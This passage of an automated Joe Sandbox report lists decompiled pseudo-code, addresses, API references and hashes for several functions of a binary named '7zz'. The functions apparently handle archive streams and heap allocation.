                                                                      • Instruction Fuzzy Hash: 3CE15D70900249DFCF10DFA4C884AEEBBB5EF49314F2445AEE559E7291CB389E85CB16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042B338 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E0042B338() {
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t92;
				void* _t100;
				intOrPtr* _t101;
				void* _t125;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				void* _t134;
				void* _t136;

				E0046B890(E0047718C, _t134);
				_t101 =  *((intOrPtr*)(_t134 + 8));
				 *((intOrPtr*)(_t134 - 0x10)) = _t136 - 0x68;
				 *(_t134 - 4) = 0;
				 *((intOrPtr*)( *_t101 + 0x10))(_t101, _t125, _t129, _t100);
				E0040862D();
				_t130 =  *((intOrPtr*)(_t134 + 0x14));
				 *(_t134 - 4) = 1;
				 *((intOrPtr*)(_t134 - 0x18)) = _t130;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130 + 4))(_t130);
				}
				 *((intOrPtr*)(_t134 - 0x14)) = 0;
				_t140 = _t130;
				 *(_t134 - 4) = 3;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130))(_t130, 0x47a578, _t134 - 0x14);
				}
				 *((intOrPtr*)(_t134 - 0x74)) = 0;
				 *(_t134 - 4) = 4;
				E00405B9F(_t134 - 0x70);
				 *((intOrPtr*)(_t134 - 0x70)) = 0x47b3b8;
				_push( *((intOrPtr*)(_t134 + 0x10)));
				 *(_t134 - 4) = 5;
				_t70 = E0042D57A(_t134 - 0x74, _t134, _t140,  *((intOrPtr*)(_t134 + 0xc)));
				_t141 = _t70;
				 *((intOrPtr*)(_t134 + 0x10)) = _t70;
				if(_t70 == 0) {
					 *(_t101 + 0x240) =  *(_t101 + 0x240) & 0x00000000;
					 *((intOrPtr*)(_t134 - 0x24)) = 0;
					 *((intOrPtr*)(_t134 - 0x20)) = 0;
					 *((intOrPtr*)(_t134 - 0x1c)) = 0;
					E00401E9A(_t134 - 0x24, 3);
					_push(_t101 + 0x240);
					_t127 = _t101 + 0x70;
					_push( *((intOrPtr*)(_t134 - 0x14)));
					 *(_t134 - 4) = 6;
					_push(_t101 + 0x70); // executed
					_t72 = E0042F024(_t134 - 0x74, __eflags); // executed
					_t132 = _t72;
					__eflags = _t132;
					if(__eflags == 0) {
						E0042EAEC(_t127);
						E0042EB2E();
						E0042EB83(_t127);
						E0040C9B4(_t101 + 0x6c,  *((intOrPtr*)(_t134 + 0xc)));
						E00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						E0042B501(_t134 - 0x74, __eflags);
						_t79 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t79;
						if(_t79 != 0) {
							 *((intOrPtr*)( *_t79 + 8))(_t79);
						}
						_t80 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t80;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						 *(_t134 - 4) =  *(_t134 - 4) & 0x00000000;
						E00430B45(_t101, __eflags);
						_t82 = 0;
					} else {
						E00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						E0042B501(_t134 - 0x74, __eflags);
						_t87 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t87;
						if(_t87 != 0) {
							 *((intOrPtr*)( *_t87 + 8))(_t87);
						}
						_t88 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t88;
						if(_t88 != 0) {
							 *((intOrPtr*)( *_t88 + 8))(_t88);
						}
						_t82 = _t132;
					}
				} else {
					 *(_t134 - 4) = 3;
					E0042B501(_t134 - 0x74, _t141);
					_t92 =  *((intOrPtr*)(_t134 - 0x14));
					 *(_t134 - 4) = 2;
					if(_t92 != 0) {
						 *((intOrPtr*)( *_t92 + 8))(_t92);
					}
					 *(_t134 - 4) = 1;
					if(_t130 != 0) {
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
					_t82 =  *((intOrPtr*)(_t134 + 0x10));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t134 - 0xc));
				return _t82;
			}



















                                                                      0x0042b33d
                                                                      0x0042b346
                                                                      0x0042b34d
                                                                      0x0042b353
                                                                      0x0042b356
                                                                      0x0042b35f
                                                                      0x0042b364
                                                                      0x0042b367
                                                                      0x0042b36d
                                                                      0x0042b370
                                                                      0x0042b375
                                                                      0x0042b375
                                                                      0x0042b378
                                                                      0x0042b37b
                                                                      0x0042b37d
                                                                      0x0042b381
                                                                      0x0042b38f
                                                                      0x0042b38f
                                                                      0x0042b391
                                                                      0x0042b397
                                                                      0x0042b39b
                                                                      0x0042b3a0
                                                                      0x0042b3a7
                                                                      0x0042b3ad
                                                                      0x0042b3b4
                                                                      0x0042b3b9
                                                                      0x0042b3bb
                                                                      0x0042b3be
                                                                      0x0042b3f3
                                                                      0x0042b405
                                                                      0x0042b408
                                                                      0x0042b40b
                                                                      0x0042b40e
                                                                      0x0042b413
                                                                      0x0042b414
                                                                      0x0042b417
                                                                      0x0042b41d
                                                                      0x0042b421
                                                                      0x0042b422
                                                                      0x0042b427
                                                                      0x0042b429
                                                                      0x0042b42b
                                                                      0x0042b46d
                                                                      0x0042b474
                                                                      0x0042b47b
                                                                      0x0042b486
                                                                      0x0042b48e
                                                                      0x0042b494
                                                                      0x0042b49b
                                                                      0x0042b4a0
                                                                      0x0042b4a3
                                                                      0x0042b4a7
                                                                      0x0042b4a9
                                                                      0x0042b4ae
                                                                      0x0042b4ae
                                                                      0x0042b4b1
                                                                      0x0042b4b4
                                                                      0x0042b4b8
                                                                      0x0042b4ba
                                                                      0x0042b4bf
                                                                      0x0042b4bf
                                                                      0x0042b4c2
                                                                      0x0042b4c8
                                                                      0x0042b4cd
                                                                      0x0042b42d
                                                                      0x0042b430
                                                                      0x0042b436
                                                                      0x0042b43d
                                                                      0x0042b442
                                                                      0x0042b445
                                                                      0x0042b449
                                                                      0x0042b44b
                                                                      0x0042b450
                                                                      0x0042b450
                                                                      0x0042b453
                                                                      0x0042b456
                                                                      0x0042b45a
                                                                      0x0042b45c
                                                                      0x0042b461
                                                                      0x0042b461
                                                                      0x0042b464
                                                                      0x0042b464
                                                                      0x0042b3c0
                                                                      0x0042b3c3
                                                                      0x0042b3c7
                                                                      0x0042b3cc
                                                                      0x0042b3cf
                                                                      0x0042b3d5
                                                                      0x0042b3da
                                                                      0x0042b3da
                                                                      0x0042b3df
                                                                      0x0042b3e3
                                                                      0x0042b3e8
                                                                      0x0042b3e8
                                                                      0x0042b3eb
                                                                      0x0042b3eb
                                                                      0x0042b4f5
                                                                      0x0042b4fe

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0042B33D
                                                                        • Part of subcall function 0042F024: __EH_prolog.LIBCMT ref: 0042F029
                                                                        • Part of subcall function 0042B501: __EH_prolog.LIBCMT ref: 0042B506
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
                                                                      • Instruction ID: 5cb2430fb4dc953f393a3ee5c8d9f9ed3e7e4da21bbd91b41222667785b49699
                                                                      • Opcode Fuzzy Hash: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
                                                                      • Instruction Fuzzy Hash: 8551A130A00258DFCF11EFA5D9846EEBBB4EF54308F24409EE805A7352CB789E41DB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00412DB2 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E00412DB2(void* __ecx) {
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr* _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t101;
				intOrPtr _t103;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t118;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t123;

				E0046B890(E00474574, _t121);
				_push(__ecx);
				 *((intOrPtr*)(_t121 - 0x10)) = _t123;
				 *((intOrPtr*)(_t121 - 4)) = 0;
				if( *((intOrPtr*)(_t121 + 0xc)) < 0 ||  *((intOrPtr*)(_t121 + 0xc)) > 3) {
					_t70 =  *((intOrPtr*)(_t121 + 8));
					_t118 = _t70 + 0x98;
					_t71 =  *((intOrPtr*)(_t70 + 0x98));
					__eflags = _t71;
					if(_t71 != 0) {
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						 *_t118 = 0;
					}
					_t72 = 0x80004005;
					goto L36;
				} else {
					_t120 =  *((intOrPtr*)(_t121 + 8));
					if( *((intOrPtr*)(_t120 + 0xa0)) != 0) {
						_t87 =  *((intOrPtr*)(_t120 + 0x9c));
						 *((intOrPtr*)(_t120 + 0xf0)) =  *((intOrPtr*)(_t120 + 0xf0)) +  !( *(_t87 + 0x18));
						 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t87 + 0x10));
						 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t87 + 0x14));
						 *((char*)(_t120 + 0x90)) = 1;
						_t89 =  *((intOrPtr*)(_t120 + 0xa0));
						if(_t89 != 0) {
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							 *((intOrPtr*)(_t120 + 0xa0)) = 0;
						}
					}
					if( *((intOrPtr*)(_t120 + 0x98)) == 0) {
						L24:
						_t115 = _t120 + 0x90;
						if( *((intOrPtr*)(_t120 + 0x90)) != 0) {
							L26:
							 *((intOrPtr*)(_t120 + 0xe8)) =  *((intOrPtr*)(_t120 + 0xe8)) +  *((intOrPtr*)(_t120 + 0x88));
							asm("adc [eax+0x4], edx");
							L27:
							_t75 = _t120 + 0xd8;
							if( *((intOrPtr*)(_t120 + 0x80)) == 0) {
								_t75 = _t120 + 0xe0;
							}
							 *_t75 =  *_t75 + 1;
							asm("adc [eax+0x4], ebx");
							if( *((intOrPtr*)(_t120 + 0x59)) != 0 &&  *((intOrPtr*)(_t120 + 0x7f)) != 0) {
								E00409A29( *((intOrPtr*)(_t120 + 0x38)),  *((intOrPtr*)(_t120 + 0x78))); // executed
							}
							_t76 =  *((intOrPtr*)(_t120 + 0x18));
							_t72 =  *((intOrPtr*)( *_t76 + 0x20))(_t76,  *((intOrPtr*)(_t121 + 0xc)),  *((intOrPtr*)(_t120 + 0x5d)));
							L36:
							 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
							return _t72;
						}
						E00411FA9(_t120);
						if( *_t115 == 0) {
							goto L27;
						}
						goto L26;
					}
					if( *((intOrPtr*)(_t120 + 0x5c)) == 0 ||  *((intOrPtr*)(_t120 + 0x7e)) == 0) {
						_t79 =  *((intOrPtr*)(_t120 + 0x10));
						__eflags =  *((intOrPtr*)(_t79 + 0x2c));
						if(__eflags == 0) {
							 *((intOrPtr*)(_t121 + 8)) = 0;
							goto L13;
						}
						_t86 = _t79 + 0x24;
						goto L9;
					} else {
						_t86 = _t120 + 0x70;
						L9:
						 *((intOrPtr*)(_t121 + 8)) = _t86;
						L13:
						if( *((intOrPtr*)(_t120 + 0x5b)) == 0 ||  *((intOrPtr*)(_t120 + 0x7d)) == 0) {
							_t112 = 0;
							__eflags = 0;
						} else {
							_t112 = _t120 + 0x68;
						}
						if( *((intOrPtr*)(_t120 + 0x5a)) == 0) {
							L20:
							_t101 = 0;
							__eflags = 0;
							goto L21;
						} else {
							_t135 =  *((intOrPtr*)(_t120 + 0x7c));
							if( *((intOrPtr*)(_t120 + 0x7c)) == 0) {
								goto L20;
							}
							_t101 = _t120 + 0x60;
							L21:
							E0040BD82( *((intOrPtr*)(_t120 + 0x94)) + 8, _t101, _t112,  *((intOrPtr*)(_t121 + 8)));
							_t103 =  *((intOrPtr*)(_t120 + 0x94));
							 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t103 + 0x18));
							 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t103 + 0x1c));
							 *((char*)(_t120 + 0x90)) = 1;
							_t72 = E0040D3F3(_t103, _t135);
							if(_t72 != 0) {
								goto L36;
							}
							_t84 =  *((intOrPtr*)(_t120 + 0x98));
							if(_t84 != 0) {
								 *((intOrPtr*)( *_t84 + 8))(_t84);
								 *((intOrPtr*)(_t120 + 0x98)) = 0;
							}
							goto L24;
						}
					}
				}
			}





















                                                                      0x00412db7
                                                                      0x00412dbc
                                                                      0x00412dc5
                                                                      0x00412dc8
                                                                      0x00412dcb
                                                                      0x00412f42
                                                                      0x00412f45
                                                                      0x00412f4b
                                                                      0x00412f51
                                                                      0x00412f53
                                                                      0x00412f58
                                                                      0x00412f5b
                                                                      0x00412f5b
                                                                      0x00412f5d
                                                                      0x00000000
                                                                      0x00412ddb
                                                                      0x00412ddb
                                                                      0x00412de4
                                                                      0x00412de6
                                                                      0x00412df1
                                                                      0x00412dfd
                                                                      0x00412e03
                                                                      0x00412e09
                                                                      0x00412e10
                                                                      0x00412e18
                                                                      0x00412e1d
                                                                      0x00412e20
                                                                      0x00412e20
                                                                      0x00412e18
                                                                      0x00412e2c
                                                                      0x00412ecd
                                                                      0x00412ed3
                                                                      0x00412ed9
                                                                      0x00412ee6
                                                                      0x00412ef2
                                                                      0x00412efe
                                                                      0x00412f01
                                                                      0x00412f07
                                                                      0x00412f0d
                                                                      0x00412f0f
                                                                      0x00412f0f
                                                                      0x00412f15
                                                                      0x00412f18
                                                                      0x00412f1e
                                                                      0x00412f2b
                                                                      0x00412f2b
                                                                      0x00412f33
                                                                      0x00412f3d
                                                                      0x00412f62
                                                                      0x00412f67
                                                                      0x00412f70
                                                                      0x00412f70
                                                                      0x00412edd
                                                                      0x00412ee4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412ee4
                                                                      0x00412e35
                                                                      0x00412e44
                                                                      0x00412e47
                                                                      0x00412e4a
                                                                      0x00412e51
                                                                      0x00000000
                                                                      0x00412e51
                                                                      0x00412e4c
                                                                      0x00000000
                                                                      0x00412e3c
                                                                      0x00412e3c
                                                                      0x00412e3f
                                                                      0x00412e3f
                                                                      0x00412e54
                                                                      0x00412e57
                                                                      0x00412e63
                                                                      0x00412e63
                                                                      0x00412e5e
                                                                      0x00412e5e
                                                                      0x00412e5e
                                                                      0x00412e68
                                                                      0x00412e74
                                                                      0x00412e74
                                                                      0x00412e74
                                                                      0x00000000
                                                                      0x00412e6a
                                                                      0x00412e6a
                                                                      0x00412e6d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412e6f
                                                                      0x00412e76
                                                                      0x00412e8a
                                                                      0x00412e8f
                                                                      0x00412e94
                                                                      0x00412e9d
                                                                      0x00412ea3
                                                                      0x00412eaa
                                                                      0x00412eb1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412eb7
                                                                      0x00412ebf
                                                                      0x00412ec4
                                                                      0x00412ec7
                                                                      0x00412ec7
                                                                      0x00000000
                                                                      0x00412ebf
                                                                      0x00412e68
                                                                      0x00412e35

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
                                                                      • Instruction ID: 07fe3d3cc5dbb80cfcc1b2f20c161f072f6c6ff10f75d1b6cf221e6a487779e4
                                                                      • Opcode Fuzzy Hash: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
                                                                      • Instruction Fuzzy Hash: CC513775600B80DFD725CF24C590BA7BBE1BB45304F08886EE49ACB312D775A99ADB14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042A0B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0042A0B8(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				E0046B890(E00476E40, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040C9B4( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}


















                                                                      0x0042a0bd
                                                                      0x0042a0c7
                                                                      0x0042a0cf
                                                                      0x0042a0d8
                                                                      0x0042a0e7
                                                                      0x0042a0da
                                                                      0x0042a0e2
                                                                      0x0042a0e2
                                                                      0x0042a0ee
                                                                      0x0042a0fa
                                                                      0x0042a0fc
                                                                      0x0042a103
                                                                      0x0042a10c
                                                                      0x0042a111
                                                                      0x0042a114
                                                                      0x0042a138
                                                                      0x0042a13d
                                                                      0x0042a143
                                                                      0x0042a147
                                                                      0x0042a14a
                                                                      0x0042a14d
                                                                      0x0042a150
                                                                      0x0042a153
                                                                      0x0042a15d
                                                                      0x0042a162
                                                                      0x0042a168
                                                                      0x0042a16b
                                                                      0x0042a18a
                                                                      0x0042a18a
                                                                      0x0042a191
                                                                      0x0042a19a
                                                                      0x0042a19d
                                                                      0x0042a1a1
                                                                      0x0042a1a3
                                                                      0x0042a1a8
                                                                      0x0042a1ad
                                                                      0x0042a1ad
                                                                      0x0042a1b0
                                                                      0x0042a116
                                                                      0x0042a116
                                                                      0x0042a119
                                                                      0x0042a11f
                                                                      0x0042a124
                                                                      0x0042a124
                                                                      0x0042a127
                                                                      0x0042a127
                                                                      0x0042a1b8
                                                                      0x0042a1c0

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
                                                                      • Instruction ID: 543cb986228c99d3567dbcd824bb6bb0964835257bbb1fe3b9b9a9f66e7197fe
                                                                      • Opcode Fuzzy Hash: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
                                                                      • Instruction Fuzzy Hash: B541BC70A00256CFCB24CF58D48486ABBF2FF48324B248AAED4969B351C730ED56CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046C003 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 24%
                                                                      			E0046C003(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x47c848);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x496584; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x49015c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0046E56A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E0046F902(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0046C0C9();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x49657c; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x496580); // executed
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E0046EE5F();
						_v8 = _v8 | 0xffffffff;
						E0046C06A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















                                                                      0x0046c006
                                                                      0x0046c008
                                                                      0x0046c00d
                                                                      0x0046c018
                                                                      0x0046c019
                                                                      0x0046c026
                                                                      0x0046c02e
                                                                      0x0046c073
                                                                      0x0046c076
                                                                      0x00000000
                                                                      0x0046c078
                                                                      0x0046c078
                                                                      0x0046c07b
                                                                      0x0046c07d
                                                                      0x0046c089
                                                                      0x0046c07f
                                                                      0x0046c07f
                                                                      0x0046c082
                                                                      0x0046c082
                                                                      0x0046c08a
                                                                      0x0046c08d
                                                                      0x0046c093
                                                                      0x0046c0c3
                                                                      0x0046c0c3
                                                                      0x00000000
                                                                      0x0046c095
                                                                      0x0046c097
                                                                      0x0046c09c
                                                                      0x0046c09d
                                                                      0x0046c0b0
                                                                      0x0046c0b3
                                                                      0x0046c0b7
                                                                      0x0046c0bc
                                                                      0x0046c0bf
                                                                      0x0046c0c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046c0c1
                                                                      0x0046c093
                                                                      0x0046c030
                                                                      0x0046c030
                                                                      0x0046c033
                                                                      0x0046c039
                                                                      0x0046c0d2
                                                                      0x0046c0d2
                                                                      0x0046c0d5
                                                                      0x0046c0d7
                                                                      0x0046c0db
                                                                      0x0046c0db
                                                                      0x0046c0df
                                                                      0x0046c0df
                                                                      0x0046c0e1
                                                                      0x0046c0e2
                                                                      0x0046c0e2
                                                                      0x0046c0ea
                                                                      0x0046c03f
                                                                      0x0046c041
                                                                      0x0046c047
                                                                      0x0046c04b
                                                                      0x0046c052
                                                                      0x0046c055
                                                                      0x0046c059
                                                                      0x0046c05e
                                                                      0x0046c063
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046c065
                                                                      0x0046c063
                                                                      0x0046c039
                                                                      0x0046c0f3
                                                                      0x0046c0fe

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0046C0EA
                                                                        • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                        • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
